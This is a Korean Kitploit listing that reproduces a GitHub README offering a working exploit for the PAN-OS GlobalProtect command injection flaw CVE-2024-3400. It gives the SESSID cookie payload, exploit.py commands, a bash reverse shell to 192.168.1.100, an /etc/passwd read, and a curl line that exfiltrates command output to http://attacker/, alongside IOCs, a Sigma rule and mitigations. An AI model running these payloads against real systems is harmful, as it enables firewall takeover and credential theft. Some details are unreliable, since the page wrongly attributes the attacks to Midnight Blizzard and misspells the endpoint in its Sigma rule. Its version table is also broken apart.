Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2024-3400-panos_rce_reproduction — cve-2024-3400-panos_rce_reproduction의 재현 | Kitploit
도구/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRed TeamingLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction의 재현

저장소 보기
28일 전아직 검토되지 않음

CVE-2024-3400: Palo Alto PAN-OS GlobalProtect 명령 주입 RCE

CVSS 10.0 치명적 | CWE-78: OS 명령 주입 | 실제 환경에서 대규모 악용됨


개요

CVE-2024-3400은 Palo Alto Networks PAN-OS GlobalProtect 포털 및 게이트웨이 인터페이스의 사전 인증 명령 주입 취약점입니다. 이 취약점으로 인해 인증되지 않은 공격자는 영향을 받는 방화벽에서 루트 권한으로 임의 명령을 실행할 수 있습니다.

  • 발견자: Volexity (2024년 4월)
  • 배후 위협 행위자: UNC4554 / Midnight Blizzard (러시아 정부 지원)
  • CVE ID: CVE-2024-3400
  • CVSS 점수: 10.0 (치명적)
  • CWE: CWE-78 (OS 명령에 사용되는 특수 요소의 부적절한 중화)
  • 영향: PAN-OS 방화벽 장비의 완전한 장악, 횡적 이동, 랜섬웨어 배포
  • 상태: 공개 전 0-day로 활발히 악용됨

기술적 세부 사항

근본 원인

취약점은 GlobalProtect 포털 및 게이트웨이 구성 요소의 세션 쿠키 처리에 있습니다. SESSID 쿠키를 처리하는 함수는 셸 명령에 전달하기 전에 사용자 입력을 제대로 검증하지 못합니다.

구체적으로, 셸 메타문자(백틱 및 변수 확장)가 포함된 조작된 SESSID 쿠키와 함께 GlobalProtect 포털 엔드포인트(/global-protect/login.esp)로 전송된 인증되지 않은 HTTP 요청은 명령 주입으로 이어집니다.

주입 메커니즘

취약한 코드 경로는 다음과 같이 작동합니다:

  1. GlobalProtect 포털이 /global-protect/login.esp에 대한 요청을 수신합니다.
  2. SESSID 쿠키 값이 검증 없이 추출됩니다.
  3. 이 값이 셸 명령 문자열에 삽입됩니다.
  4. 명령은 system() 또는 이와 유사한 OS 명령 실행 함수를 통해 실행됩니다.
  5. 애플리케이션이 루트로 실행되므로 주입된 명령은 전체 시스템 권한으로 실행됩니다.

페이로드 구성

주입 페이로드는 SESSID 쿠키 내에서 백틱으로 구분된 명령을 사용합니다:

root@kitploit:~
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

경로 탐색(/../../../)은 의도된 디렉터리를 벗어나고, 백틱으로 묶인 COMMAND 부분으로 인해 셸이 공격자의 입력을 실행합니다. 출력 리디렉션 또는 리버스 셸 메커니즘을 사용하여 명령 결과를 유출할 수 있습니다.


영향을 받는 버전

PAN-OS 버전영향받는 버전수정 버전
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1
11.0.x< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h10

참고: PAN-OS 9.x 및 이전 버전은 영향을 받지 않습니다. Cloud NGFW 및 Prisma Access는 영향을 받지 않습니다.


악용

공격 벡터

  • 네트워크: 원격
  • 인증: 필요 없음
  • 필요 권한: 없음
  • 사용자 상호 작용: 없음
  • 영향: 기밀성, 무결성, 가용성의 완전한 침해

관찰된 위협 행위자 활동

UNC4554 / Midnight Blizzard(APT29)가 2024년 3월부터 CVE-2024-3400을 0-day로 악용하는 것이 관찰되었습니다. Volexity는 2024년 4월 12일에 분석을 발표했습니다. 공격 패턴은 다음과 같습니다:

  1. 초기 접근: 노출된 GlobalProtect 포털 대량 스캔
  2. 명령 실행: 쿠키 주입 벡터를 통한 맞춤형 Python 백도어 배포
  3. 지속성: UPSTYLE 백도어 설치, 자격 증명 탈취, 구성 추출
  4. 횡적 이동: 손상된 방화벽을 내부 네트워크 진입 거점으로 사용
  5. 데이터 유출: 구성 파일, VPN 자격 증명, 세션 토큰 탈취
  6. 랜섬웨어: 초기 침해 이후 랜섬웨어 배포 사례 다수 발생

PoC(개념 증명) 공개 현황

여러 공개 PoC가 공개되었습니다. 이 저장소는 승인된 테스트를 위한 기능적 익스플로잇을 제공합니다.


재현 단계

요구 사항

  • Python 3.8+
  • requests 라이브러리
  • 대상: 취약한 GlobalProtect 포털이 노출된 Palo Alto PAN-OS
  • 승인된 접근만 허용

설정

root@kitploit:~
pip install requests

기본 익스플로잇

root@kitploit:~
python exploit.py --target https://vulnerable-firewall.example.com --command "id"

리버스 셸 예시

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 4444

# Execute reverse shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

임의 파일 읽기

root@kitploit:~
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

개념 증명 (curl)

root@kitploit:~
# Basic command execution test
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# Command output capture via DNS exfiltration
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

PoC 스크립트

이 저장소의 exploit.py는 다음을 지원하는 완전한 기능의 Python 익스플로잇입니다:

  • 임의 명령 실행
  • 선택적 프록시 지원 (Burp Suite / mitmproxy)
  • SSL 검증 제어
  • 타임아웃 및 재시도 처리
  • 응답 분석

탐지

침해 지표(IOC)

  • 비정상적으로 길거나 의심스러운 SESSID 쿠키를 포함한 /global-protect/login.esp 요청
  • 경로 탐색 시퀀스(/../../)와 백틱 문자가 결합된 쿠키
  • GlobalProtect 구성 요소에 의해 생성된 예기치 않은 프로세스
  • 방화벽에서 비정상적인 포트의 알 수 없는 IP 주소로의 아웃바운드 연결
  • /opt/panlogs/tmp/device_telemetry/에 .py 확장자로 작성된 파일

Sigma 규칙 (단순화)

root@kitploit:~
title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

완화 조치

즉시 조치

  1. PAN-OS 업데이트 - 위에 나열된 수정 버전으로 업데이트
  2. 즉시 패치가 불가능한 경우 다음 해결 방법 중 하나를 적용합니다:
    • 장치 원격 측정(Device Telemetry) 비활성화: set deviceconfig system telemetry disable yes (재부팅 없이 취약한 코드 경로 차단)
    • GlobalProtect 포털/게이트웨이 접근 제어: 신뢰할 수 있는 소스 IP로 접근 제한
  3. 침해 여부 스캔: /opt/panlogs/tmp/device_telemetry/에 무단 파일이 있는지 확인
  4. 로그 검토: 비정상적인 SESSID 쿠키 값이 있는지 GlobalProtect 로그인 로그 감사

영구 수정

Palo Alto Networks에서 제공하는 핫픽스를 적용합니다. 이 수정은 셸 명령 구성 전에 쿠키 입력을 제대로 검증합니다.

침해 평가

악용이 의심되는 경우:

  1. 영향을 받는 방화벽의 포렌식 이미지 수집
  2. 모든 구성 변경 사항 감사 (마지막 수정 타임스탬프)
  3. 실행 중인 프로세스 및 cron 작업 검토
  4. 무단 SSH 키 및 사용자 계정 확인
  5. 모든 VPN 자격 증명 및 공유 비밀 교체
  6. C2 통신 패턴이 있는지 네트워크 트래픽 검사

참고 자료


면책 조항

이 저장소는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다. 이 취약점의 무단 악용은 불법입니다. 작성자는 이 정보의 오용에 대해 책임을 지지 않습니다. 시스템을 테스트하기 전에 항상 명시적인 서면 허가를 받았는지 확인하세요.


라이선스

MIT 라이선스 - 이 콘텐츠는 방어적 보안 연구 및 승인된 테스트를 위해 제공됩니다.

도구 다운로드
11.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3
출처링크
Palo Alto 보안 권고https://security.paloaltonetworks.com/CVE-2024-3400
Volexity 분석https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-command-injection-vulnerability-in-palo-alto-networks-pan-os/
NVD 항목https://nvd.nist.gov/vuln/detail/CVE-2024-3400
CWE-78 상세https://cwe.mitre.org/data/definitions/78.html
CISA KEVhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
ATT&CK 기법https://attack.mitre.org/techniques/T1190/